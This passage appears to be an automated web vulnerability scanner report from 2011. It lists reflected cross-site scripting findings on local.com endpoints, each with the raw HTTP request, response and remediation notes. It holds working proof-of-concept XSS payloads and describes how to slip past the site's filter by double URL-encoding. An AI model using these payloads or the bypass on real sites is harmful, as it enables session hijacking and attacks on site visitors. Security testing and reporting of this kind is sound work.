Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 894
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:35 GMT
Connection: close
Content-Length: 894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=8;tile=858aaf';b65e854cbc0;city=dallas_tx;sz=310x101;ord=1296748882748?" type="text/javascript">
...[SNIP]...

2.16. http://www.local.com/dart/ [zone parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The value of the zone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15298%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effbd7ca082c was submitted in the zone parameter. This input was echoed as 15298"><script>alert(1)</script>ffbd7ca082c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the zone request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_1502010015298%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effbd7ca082c HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1107
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:17 GMT
Connection: close
Content-Length: 1107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_1502010015298"><script>alert(1)</script>ffbd7ca082c;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748812638?" target="_blank">
...[SNIP]...

2.17. http://www.local.com/dart/ [zone parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The value of the zone request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc52c%2527%253balert%25281%2529%252f%252fd85ccbd701b was submitted in the zone parameter. This input was echoed as fc52c';alert(1)//d85ccbd701b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the zone request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100fc52c%2527%253balert%25281%2529%252f%252fd85ccbd701b HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1062
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:17 GMT
Connection: close
Content-Length: 1062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.sp/retail_banks_15020100fc52c';alert(1)//d85ccbd701b;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748812638?" type="text/javascript">
...[SNIP]...

2.18. http://www.local.com/events/category/music/dallas-tx.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/category/music/dallas-tx.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c9e7'-alert(1)-'22f4ee6710f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /events/category/music/dallas-tx.aspx?8c9e7'-alert(1)-'22f4ee6710f=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

2.19. http://www.local.com/events/category/performing-arts/dallas-tx.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/category/performing-arts/dallas-tx.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60e4c'-alert(1)-'1c8163cafb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /events/category/performing-arts/dallas-tx.aspx?60e4c'-alert(1)-'1c8163cafb2=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

2.20. http://www.local.com/events/category/sports/dallas-tx.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/category/sports/dallas-tx.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66d6b'-alert(1)-'8080df3d42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /events/category/sports/dallas-tx.aspx?66d6b'-alert(1)-'8080df3d42=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

2.21. http://www.local.com/results.aspx [cid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.local.com
Path:	/results.aspx

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d27c6"%3b652d94a4b4b was submitted in the cid parameter. This input was echoed as d27c6";652d94a4b4b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /results.aspx?keyword=banks&cid=506d27c6"%3b652d94a4b4b&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

2.22. http://www.local.com/results.aspx [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/results.aspx

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c80ba"style%3d"x%3aexpression(alert(1))"45503434253 was submitted in the cid parameter. This input was echoed as c80ba"style="x:expression(alert(1))"45503434253 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=banks&cid=506c80ba"style%3d"x%3aexpression(alert(1))"45503434253&client=ca-dp-r-mark03_3ph_js HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

2.23. http://www.local.com/results.aspx [client parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/results.aspx

Issue detail

The value of the client request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a134f"style%3d"x%3aexpression(alert(1))"fccc9411126 was submitted in the client parameter. This input was echoed as a134f"style="x:expression(alert(1))"fccc9411126 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_jsa134f"style%3d"x%3aexpression(alert(1))"fccc9411126 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

2.24. http://www.local.com/results.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/results.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a378"style%3d"x%3aexpression(alert(1))"043ffc8a60a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a378"style="x:expression(alert(1))"043ffc8a60a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_js&9a378"style%3d"x%3aexpression(alert(1))"043ffc8a60a=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

2.25. http://www.local.com/topics/ [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.local.com
Path:	/topics/

Issue detail

The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0f6f"%3bb0022a17af6 was submitted in the keyword parameter. This input was echoed as b0f6f";b0022a17af6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /topics/?topic=food&keyword=foodb0f6f"%3bb0022a17af6 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

2.26. http://www.local.com/ver1.0/Direct/Jsonp [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/ver1.0/Direct/Jsonp

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 8cbb2<script>alert(1)</script>2eab8d1e87a was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22UpdateArticleAction%22%3A%7B%22Categories%22%3A%5B%5D%2C%22OnPageTitle%22%3A%22Hillcrest%20Bank%20%2528Dallas%252C%20TX%2529%22%2C%22OnPageUrl%22%3A%22104826937%7CHillcrest%20Bank%7CDallas%252C%20TX%22%2C%22Section%22%3A%7B%22Section%22%3A%7B%22Name%22%3A%22Dallas%2C%20TX%22%7D%7D%2C%22UpdateArticle%22%3A%7B%22ArticleKey%22%3A%7B%22Key%22%3A%22104826937%22%7D%7D%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback08cbb2<script>alert(1)</script>2eab8d1e87a&pcksl=http%3A%2F%2Fwww.local.com&pckdt=local.com HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; ym_pop_freq1421534=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL02proddmlocal
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript; charset=utf-8
Date: Thu, 03 Feb 2011 16:06:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SiteLifeHost=SJL01WSITELCL02proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=663488778.20480.0000; path=/ ; domain=local.com; path=/
Content-Length: 188

RequestBatch.callbacks.daapiCallback08cbb2<script>alert(1)</script>2eab8d1e87a({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"02/03/2011 08:06:04:885 AM"}],"Responses":[]}});

2.27. http://www.local.com/ver1.0/ReviewPage.app [articleKey parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/ver1.0/ReviewPage.app

Issue detail

The value of the articleKey request parameter is copied into the HTML document as plain text between tags. The payload 76469<script>alert(1)</script>5cd27d00a02 was submitted in the articleKey parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/ReviewPage.app?onPage=1&reviewsPerPage=10&articleKey=10482693776469<script>alert(1)</script>5cd27d00a02&pcksl=http%3A%2F%2Fwww.local.com&pckdt=local.com&rand=1296748922751 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; ym_pop_freq1421534=1; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL01proddmlocal
Vary: Content-Encoding
Cache-Control: private
Content-Type: application/json
Date: Thu, 03 Feb 2011 16:06:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
Content-Length: 657

{
"ReviewsPage": {
"SortType": {
"SortOrder": "Descending",
"ObjectType": "Models.System.Sorting.TimestampSort"
},
"AverageReviewRating": 0.0,
"TotalItems": 0,
"ReviewOnKey": {
"Key": "10482693776469<script>alert(1)</script>5cd27d00a02",
"ObjectType": "Models.External.ExternalResourceKey"
},
"ItemsPerPage": 10,
"ObjectType": "Responses.Reactions.ReviewsPageResponse",
"Items": [],
"OneBasedOnPage": 1,
...[SNIP]...

